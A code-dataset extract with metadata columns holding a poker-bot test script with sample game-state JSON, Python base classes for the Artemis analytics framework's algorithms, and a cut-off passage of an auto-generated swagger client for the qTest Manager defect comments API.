hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
7947205d7b124abc0236cf35ac8f0d0f3f4d2756
| 5,950
|
py
|
Python
|
test.py
|
czella/poker-player-theempiredidnothingwrong
|
fd064967b9ff37c81a22cb22e72ff086a752e158
|
[
"MIT"
] | null | null | null |
test.py
|
czella/poker-player-theempiredidnothingwrong
|
fd064967b9ff37c81a22cb22e72ff086a752e158
|
[
"MIT"
] | null | null | null |
test.py
|
czella/poker-player-theempiredidnothingwrong
|
fd064967b9ff37c81a22cb22e72ff086a752e158
|
[
"MIT"
] | null | null | null |
import player
import json
testJSon_one_high = json.loads("""{"community_cards": [],
"minimum_raise": 2,
"big_blind": 4,
"orbits": 0,
"in_action": 3,
"bet_index": 2,
"current_buy_in": 4,
"round": 0,
"players": [{"id": 0, "bet": 0, "version": "Pony 1.0.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Bright Pony"},
{"id": 1, "bet": 2, "version": "1.0", "time_used": 0, "stack": 998, "status": "active", "name": "PokerMasters"},
{"id": 2, "bet": 4, "version": "ERROR: Unreachable", "time_used": 0, "stack": 996, "status": "active", "name": "NADagascar"},
{"hole_cards": [{"suit": "hearts", "rank": "4"},
{"suit": "diamonds", "rank": "Q"}],
"bet": 0,
"version": "DS.1.0.0",
"time_used": 0,
"id": 3,
"stack": 1000,
"status": "active",
"name": "TheEmpireDidNothingWrong"},
{"id": 4,
"bet": 0,
"version": "1.0",
"time_used": 0,
"stack": 1000,
"status": "active",
"name": "Hive"},
{"id": 5, "bet": 0, "version": "Gopnik_FM_ver_1.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Gopnik FM"}],
"small_blind": 2,
"game_id": "5c5d4b96a972e80004000021",
"dealer": 0,
"pot": 6,
"tournament_id": "5c38a553b0fea40004000003"}
""")
testJSon_two_high = json.loads("""{"community_cards": [],
"minimum_raise": 2,
"big_blind": 4,
"orbits": 0,
"in_action": 3,
"bet_index": 2,
"current_buy_in": 4,
"round": 0,
"players": [{"id": 0, "bet": 0, "version": "Pony 1.0.0", "time_used": 0, "stack": 1000, "status": "out", "name": "Bright Pony"},
{"id": 1, "bet": 2, "version": "1.0", "time_used": 0, "stack": 998, "status": "active", "name": "PokerMasters"},
{"id": 2, "bet": 4, "version": "ERROR: Unreachable", "time_used": 0, "stack": 996, "status": "active", "name": "NADagascar"},
{"hole_cards": [{"suit": "hearts", "rank": "J"},
{"suit": "diamonds", "rank": "Q"}],
"bet": 0,
"version": "DS.1.0.0",
"time_used": 0,
"id": 3,
"stack": 1000,
"status": "active",
"name": "TheEmpireDidNothingWrong"},
{"id": 4,
"bet": 0,
"version": "1.0",
"time_used": 0,
"stack": 1000,
"status": "active",
"name": "Hive"},
{"id": 5, "bet": 0, "version": "Gopnik_FM_ver_1.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Gopnik FM"}],
"small_blind": 2,
"game_id": "5c5d4b96a972e80004000021",
"dealer": 0,
"pot": 6,
"tournament_id": "5c38a553b0fea40004000003"}
""")
testJSon_three_out_one_high = json.loads("""{"community_cards": [],
"minimum_raise": 2,
"big_blind": 4,
"orbits": 0,
"in_action": 3,
"bet_index": 2,
"current_buy_in": 4,
"round": 0,
"players": [{"id": 0, "bet": 0, "version": "Pony 1.0.0", "time_used": 0, "stack": 1000, "status": "out", "name": "Bright Pony"},
{"id": 1, "bet": 2, "version": "1.0", "time_used": 0, "stack": 998, "status": "out", "name": "PokerMasters"},
{"id": 2, "bet": 4, "version": "ERROR: Unreachable", "time_used": 0, "stack": 996, "status": "out", "name": "NADagascar"},
{"hole_cards": [{"suit": "hearts", "rank": "2"},
{"suit": "diamonds", "rank": "Q"}],
"bet": 0,
"version": "DS.1.0.0",
"time_used": 0,
"id": 3,
"stack": 1000,
"status": "active",
"name": "TheEmpireDidNothingWrong"},
{"id": 4,
"bet": 0,
"version": "1.0",
"time_used": 0,
"stack": 1000,
"status": "active",
"name": "Hive"},
{"id": 5, "bet": 0, "version": "Gopnik_FM_ver_1.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Gopnik FM"}],
"small_blind": 2,
"game_id": "5c5d4b96a972e80004000021",
"dealer": 0,
"pot": 6,
"tournament_id": "5c38a553b0fea40004000003"}
""")
testJSon_three_out_two_high = json.loads("""{"community_cards": [],
"minimum_raise": 2,
"big_blind": 4,
"orbits": 0,
"in_action": 3,
"bet_index": 2,
"current_buy_in": 4,
"round": 0,
"players": [{"id": 0, "bet": 0, "version": "Pony 1.0.0", "time_used": 0, "stack": 1000, "status": "out", "name": "Bright Pony"},
{"id": 1, "bet": 2, "version": "1.0", "time_used": 0, "stack": 998, "status": "out", "name": "PokerMasters"},
{"id": 2, "bet": 4, "version": "ERROR: Unreachable", "time_used": 0, "stack": 996, "status": "out", "name": "NADagascar"},
{"hole_cards": [{"suit": "hearts", "rank": "Q"},
{"suit": "diamonds", "rank": "Q"}],
"bet": 0,
"version": "DS.1.0.0",
"time_used": 0,
"id": 3,
"stack": 1000,
"status": "active",
"name": "TheEmpireDidNothingWrong"},
{"id": 4,
"bet": 0,
"version": "1.0",
"time_used": 0,
"stack": 1000,
"status": "active",
"name": "Hive"},
{"id": 5, "bet": 0, "version": "Gopnik_FM_ver_1.0", "time_used": 0, "stack": 1000, "status": "active", "name": "Gopnik FM"}],
"small_blind": 2,
"game_id": "5c5d4b96a972e80004000021",
"dealer": 0,
"pot": 6,
"tournament_id": "5c38a553b0fea40004000003"}
""")
if __name__ == "__main__":
player = player.Player()
print(player.betRequest(testJSon_one_high))
print(player.betRequest(testJSon_two_high))
print(player.betRequest(testJSon_three_out_one_high))
print(player.betRequest(testJSon_three_out_two_high))
| 39.666667
| 138
| 0.482857
| 666
| 5,950
| 4.145646
| 0.10961
| 0.06954
| 0.078233
| 0.072438
| 0.965954
| 0.963419
| 0.949294
| 0.919594
| 0.919594
| 0.917421
| 0
| 0.09409
| 0.289076
| 5,950
| 149
| 139
| 39.932886
| 0.558629
| 0
| 0
| 0.881944
| 0
| 0.111111
| 0.921513
| 0.055126
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.013889
| 0
| 0.013889
| 0.027778
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
795b548761b1c07cb92bc8835aaaa00ac9a7d887
| 12,529
|
py
|
Python
|
artemis/core/algo.py
|
artemis-analytics/artemis
|
3e1eebdd4628145ee7d8923567b5e6f53a2e5244
|
[
"Apache-2.0"
] | 4
|
2020-02-29T15:02:05.000Z
|
2021-05-13T18:50:58.000Z
|
artemis/core/algo.py
|
artemis-analytics/artemis
|
3e1eebdd4628145ee7d8923567b5e6f53a2e5244
|
[
"Apache-2.0"
] | 25
|
2020-02-25T19:29:21.000Z
|
2020-04-03T15:06:59.000Z
|
artemis/core/algo.py
|
ryanmwhitephd/artemis
|
3e1eebdd4628145ee7d8923567b5e6f53a2e5244
|
[
"Apache-2.0"
] | 2
|
2021-08-12T09:40:51.000Z
|
2021-08-12T09:42:09.000Z
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © Her Majesty the Queen in Right of Canada, as represented
# by the Minister of Statistics Canada, 2019.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Algorithms
"""
from collections import OrderedDict
import importlib
from pprint import pformat
from artemis.logger import Logger
from artemis.core.abcalgo import AbcAlgoBase
from artemis.core.properties import Properties
from artemis.core.gate import ArtemisGateSvc
from artemis.io.protobuf.configuration_pb2 import Module as Algo_pb
from artemis.core.gate import IOMetaMixin, MetaMixin
# TODO Create an interface class to AlgoBase to expose the run,
# finalize methods to framework
# Interface IAlgoBase class to expose the methods to the framework
# (apparently, I should not write a framework, see Fluent Python ...
# I am bored but probably getting paid)
# Concrete implementation of interface with AlgoBase
# Concrete base class provides the mixins or other ABCs
# Likely we want to provide the Job class instance to retrieve
# job.histbook
# job.timers
# job.objectstore
# Inherited classes for user-defined methods MyAlgo
class AlgoBase(MetaMixin, metaclass=AbcAlgoBase):
def __init__(self, name, **kwargs):
"""
Access the Base logger directly through
self.__logger
Derived class use the classmethods for info, debug, warn, error
All formatting, loglevel checks, etc...
can be done through the classmethods
Can we use staticmethods in artemis to make uniform
formatting of info, debug, warn, error?
"""
# Configure logging
Logger.configure(self, **kwargs)
self.__logger.debug("__init__ AlgoBase")
# name will be mangled to _AlgoBase__name
self.__name = name
self.properties = Properties()
for key in kwargs:
self.properties.add_property(key, kwargs[key])
self.gate = ArtemisGateSvc()
def __init_subclass__(cls, **kwargs):
"""
See PEP 487
Essentially acts as a class method decorator
"""
super().__init_subclass__(**kwargs)
@property
def name(self):
"""
Algorithm name
"""
return self.__name
@staticmethod
def load(logger, **kwargs):
"""
Returns the class instance from a dictionary
"""
logger.info("Loading Algo %s" % kwargs["name"])
try:
module = importlib.import_module(kwargs["module"])
except ImportError:
logger.error("Unable to load module %s" % kwargs["module"])
raise
except Exception as e:
logger.error("Unknow error loading module: %s" % e)
raise
try:
class_ = getattr(module, kwargs["class"])
except AttributeError:
logger.error("%s: missing attribute %s" % (kwargs["name"], kwargs["class"]))
raise
except Exception as e:
logger.error("Reason: %s" % e)
raise
logger.debug(pformat(kwargs["properties"]))
# Update the logging level of
# algorithms if loglevel not set
# Ensures user-defined algos get the artemis level logging
if "loglevel" not in kwargs["properties"]:
kwargs["properties"]["loglevel"] = logger.getEffectiveLevel()
try:
instance = class_(kwargs["name"], **kwargs["properties"])
except AttributeError:
logger.error("%s: missing attribute %s" % (kwargs["name"], "properties"))
raise
except Exception as e:
logger.error("%s: Cannot initialize %s" % e)
raise
return instance
def to_dict(self):
"""
Create json-serialize class
to create the algorithm from all properties
name - instance name as found in menu
module - where the class algo resides
class - concrete class name
properties - all the user-defined properties
"""
_dict = OrderedDict()
_dict["name"] = self.name
_dict["class"] = self.__class__.__name__
_dict["module"] = self.__module__
_dict["properties"] = self.properties.to_dict()
return _dict
def to_msg(self):
message = Algo_pb()
message.name = self.name
message.klass = self.__class__.__name__
message.module = self.__module__
message.properties.CopyFrom(self.properties.to_msg())
return message
@staticmethod
def from_msg(logger, msg):
logger.info("Loading Algo from msg %s", msg.name)
try:
module = importlib.import_module(msg.module)
except ImportError:
logger.error("Unable to load module %s", msg.module)
raise
except Exception as e:
logger.error("Unknow error loading module: %s" % e)
raise
try:
class_ = getattr(module, msg.klass)
except AttributeError:
logger.error("%s: missing attribute %s" % (msg.name, msg.klass))
raise
except Exception as e:
logger.error("Reason: %s" % e)
raise
properties = Properties.from_msg(msg.properties)
logger.debug(pformat(properties))
# Update the logging level of
# algorithms if loglevel not set
# Ensures user-defined algos get the artemis level logging
if "loglevel" not in properties:
properties["loglevel"] = logger.getEffectiveLevel()
try:
instance = class_(msg.name, **properties)
except AttributeError:
logger.error("%s: missing attribute %s" % (msg.name, "properties"))
raise
except Exception as e:
logger.error("%s: Cannot initialize %s" % e)
raise
return instance
def lock(self):
"""
Lock all properties for algorithm
"""
self.properties.lock = True
def initialize(self):
"""
Framework initialize
"""
raise NotImplementedError
def book(self):
"""
Book histograms
"""
raise NotImplementedError
def rebook(self):
"""
Rebook with new binnings
"""
raise NotImplementedError
def execute(self, payload):
"""
Algo always accepts the output Node on a graph
Data is accessed via the Parent.payload
"""
raise NotImplementedError
def finalize(self):
"""
report timings, counters, etc..
"""
raise NotImplementedError
class IOAlgoBase(MetaMixin, IOMetaMixin, metaclass=AbcAlgoBase):
def __init__(self, name, **kwargs):
"""
Access the Base logger directly through
self.__logger
Derived class use the classmethods for info, debug, warn, error
All formatting, loglevel checks, etc...
can be done through the classmethods
Can we use staticmethods in artemis to make uniform
formatting of info, debug, warn, error?
"""
# Configure logging
Logger.configure(self, **kwargs)
self.__logger.debug("__init__ AlgoBase")
# name will be mangled to _AlgoBase__name
self.__name = name
self.properties = Properties()
for key in kwargs:
self.properties.add_property(key, kwargs[key])
self.gate = ArtemisGateSvc()
@property
def name(self):
"""
Algorithm name
"""
return self.__name
@staticmethod
def load(logger, **kwargs):
"""
Returns the class instance from a dictionary
"""
logger.info("Loading Algo %s" % kwargs["name"])
try:
module = importlib.import_module(kwargs["module"])
except ImportError:
logger.error("Unable to load module %s" % kwargs["module"])
raise
except Exception as e:
logger.error("Unknow error loading module: %s" % e)
raise
try:
class_ = getattr(module, kwargs["class"])
except AttributeError:
logger.error("%s: missing attribute %s" % (kwargs["name"], kwargs["class"]))
raise
except Exception as e:
logger.error("Reason: %s" % e)
raise
logger.debug(pformat(kwargs["properties"]))
# Update the logging level of
# algorithms if loglevel not set
# Ensures user-defined algos get the artemis level logging
if "loglevel" not in kwargs["properties"]:
kwargs["properties"]["loglevel"] = logger.getEffectiveLevel()
try:
instance = class_(kwargs["name"], **kwargs["properties"])
except AttributeError:
logger.error("%s: missing attribute %s" % (kwargs["name"], "properties"))
raise
except Exception as e:
logger.error("%s: Cannot initialize %s" % e)
raise
return instance
def to_dict(self):
"""
Create json-serialize class
to create the algorithm from all properties
name - instance name as found in menu
module - where the class algo resides
class - concrete class name
properties - all the user-defined properties
"""
_dict = OrderedDict()
_dict["name"] = self.name
_dict["class"] = self.__class__.__name__
_dict["module"] = self.__module__
_dict["properties"] = self.properties.to_dict()
return _dict
def to_msg(self):
message = Algo_pb()
message.name = self.name
message.klass = self.__class__.__name__
message.module = self.__module__
message.properties.CopyFrom(self.properties.to_msg())
return message
@staticmethod
def from_msg(logger, msg):
logger.info("Loading Algo from msg %s", msg.name)
try:
module = importlib.import_module(msg.module)
except ImportError:
logger.error("Unable to load module %s", msg.module)
raise
except Exception as e:
logger.error("Unknow error loading module: %s" % e)
raise
try:
class_ = getattr(module, msg.klass)
except AttributeError:
logger.error("%s: missing attribute %s" % (msg.name, msg.klass))
raise
except Exception as e:
logger.error("Reason: %s" % e)
raise
properties = Properties.from_msg(msg.properties)
logger.debug(pformat(properties))
# Update the logging level of
# algorithms if loglevel not set
# Ensures user-defined algos get the artemis level logging
if "loglevel" not in properties:
properties["loglevel"] = logger.getEffectiveLevel()
try:
instance = class_(msg.name, **properties)
except AttributeError:
logger.error("%s: missing attribute %s" % (msg.name, "properties"))
raise
except Exception as e:
logger.error("%s: Cannot initialize %s" % e)
raise
return instance
def lock(self):
"""
Lock all properties for algorithm
"""
self.properties.lock = True
def initialize(self):
"""
Framework initialize
"""
raise NotImplementedError
def book(self):
"""
Book histograms
"""
raise NotImplementedError
def rebook(self):
"""
Rebook with new binnings
"""
raise NotImplementedError
def execute(self, payload):
"""
Algo always accepts the output Node on a graph
Data is accessed via the Parent.payload
"""
raise NotImplementedError
def finalize(self):
"""
report timings, counters, etc..
"""
raise NotImplementedError
| 30.708333
| 88
| 0.600447
| 1,371
| 12,529
| 5.387309
| 0.185266
| 0.035743
| 0.032494
| 0.035743
| 0.810181
| 0.803412
| 0.803412
| 0.803412
| 0.803412
| 0.803412
| 0
| 0.001618
| 0.309522
| 12,529
| 407
| 89
| 30.783784
| 0.85204
| 0.273685
| 0
| 0.938967
| 0
| 0
| 0.115973
| 0
| 0
| 0
| 0
| 0.002457
| 0
| 1
| 0.117371
| false
| 0
| 0.079812
| 0
| 0.253521
| 0.004695
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
796417e97d6a7fa72201c1a8d5b68b358c909421
| 51,082
|
py
|
Python
|
swagger_client/apis/defect_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 1
|
2019-09-10T17:55:53.000Z
|
2019-09-10T17:55:53.000Z
|
swagger_client/apis/defect_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | null | null | null |
swagger_client/apis/defect_api.py
|
rcbops/qtest-swagger-client
|
28220aa95d878922ca4b35c325706932adabea4e
|
[
"Apache-2.0"
] | 2
|
2019-02-12T23:15:10.000Z
|
2022-03-11T20:08:28.000Z
|
# coding: utf-8
"""
qTest Manager API Version 8.6 - 9.1
qTest Manager API Version 8.6 - 9.1
OpenAPI spec version: 8.6 - 9.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class DefectApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_comment(self, project_id, id_or_key, body, **kwargs):
"""
Adds a Comment to a Defect
To add a Comment to a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_comment(project_id, id_or_key, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect (required)
:param CommentResource body: The Comment's content (required)
:return: CommentResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_comment_with_http_info(project_id, id_or_key, body, **kwargs)
else:
(data) = self.add_comment_with_http_info(project_id, id_or_key, body, **kwargs)
return data
def add_comment_with_http_info(self, project_id, id_or_key, body, **kwargs):
"""
Adds a Comment to a Defect
To add a Comment to a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_comment_with_http_info(project_id, id_or_key, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect (required)
:param CommentResource body: The Comment's content (required)
:return: CommentResource
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'id_or_key', 'body']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_comment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `add_comment`")
# verify the required parameter 'id_or_key' is set
if ('id_or_key' not in params) or (params['id_or_key'] is None):
raise ValueError("Missing the required parameter `id_or_key` when calling `add_comment`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_comment`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'id_or_key' in params:
path_params['idOrKey'] = params['id_or_key']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CommentResource',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_comment(self, project_id, id_or_key, comment_id, **kwargs):
"""
Deletes a Comment of a Defect
To delete a specific Comment of a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_comment(project_id, id_or_key, comment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect whose Comment you want to delete (required)
:param int comment_id: ID of the comment. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_comment_with_http_info(project_id, id_or_key, comment_id, **kwargs)
else:
(data) = self.delete_comment_with_http_info(project_id, id_or_key, comment_id, **kwargs)
return data
def delete_comment_with_http_info(self, project_id, id_or_key, comment_id, **kwargs):
"""
Deletes a Comment of a Defect
To delete a specific Comment of a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_comment_with_http_info(project_id, id_or_key, comment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect whose Comment you want to delete (required)
:param int comment_id: ID of the comment. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['project_id', 'id_or_key', 'comment_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_comment" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'project_id' is set
if ('project_id' not in params) or (params['project_id'] is None):
raise ValueError("Missing the required parameter `project_id` when calling `delete_comment`")
# verify the required parameter 'id_or_key' is set
if ('id_or_key' not in params) or (params['id_or_key'] is None):
raise ValueError("Missing the required parameter `id_or_key` when calling `delete_comment`")
# verify the required parameter 'comment_id' is set
if ('comment_id' not in params) or (params['comment_id'] is None):
raise ValueError("Missing the required parameter `comment_id` when calling `delete_comment`")
collection_formats = {}
resource_path = '/api/v3/projects/{projectId}/defects/{idOrKey}/comments/{commentId}'.replace('{format}', 'json')
path_params = {}
if 'project_id' in params:
path_params['projectId'] = params['project_id']
if 'id_or_key' in params:
path_params['idOrKey'] = params['id_or_key']
if 'comment_id' in params:
path_params['commentId'] = params['comment_id']
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['Authorization']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_comment(self, project_id, id_or_key, comment_id, **kwargs):
"""
Gets a Comment of a Defect
To retrieve a specific Comment of a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_comment(project_id, id_or_key, comment_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param int project_id: ID of the project (required)
:param str id_or_key: PID or ID of the Defect whose comment you want to retrieve (required)
:param int comment_id: ID of the comment (required)
:return: CommentResource
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_comment_with_http_info(project_id, id_or_key, comment_id, **kwargs)
else:
(data) = self.get_comment_with_http_info(project_id, id_or_key, comment_id, **kwargs)
return data
def get_comment_with_http_info(self, project_id, id_or_key, comment_id, **kwargs):
"""
Gets a Comment of a Defect
To retrieve a specific Comment of a Defect <strong>qTest Manager version:</strong> 7.5+
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
